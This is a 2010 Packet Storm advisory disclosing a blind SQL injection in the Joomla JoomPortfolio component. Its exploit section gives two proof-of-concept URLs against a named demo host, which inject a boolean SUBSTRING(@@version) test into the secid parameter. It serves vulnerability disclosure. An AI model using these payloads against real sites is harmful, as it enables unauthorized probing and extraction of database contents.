Joomla JoomPortfolio Blind SQL Injection

2010-02-15T00:00:00
ID PACKETSTORM:86323
Type packetstorm
Reporter Snakespc
Modified 2010-02-15T00:00:00

Description

                                        
                                            `==============================================================================  
[»] Joomla com_joomportfolio Remote Blind Injection Vulnerability  
==============================================================================  
  
[»] Script: [Joomla]  
[»] Language: [ PHP ]  
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]  
[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]  
  
###########################################################################  
===[ Exploit ]===  
  
[»] http://demo.joomplace.com/index.php?option=com_joomportfolio&task=showsec&Itemid=44&secid=1+AND SUBSTRING(@@version,1,1)=4 (no)  
[»] http://demo.joomplace.com/index.php?option=com_joomportfolio&task=showsec&Itemid=44&secid=1+AND SUBSTRING(@@version,1,1)=5 (yas)  
###########################################################################  
`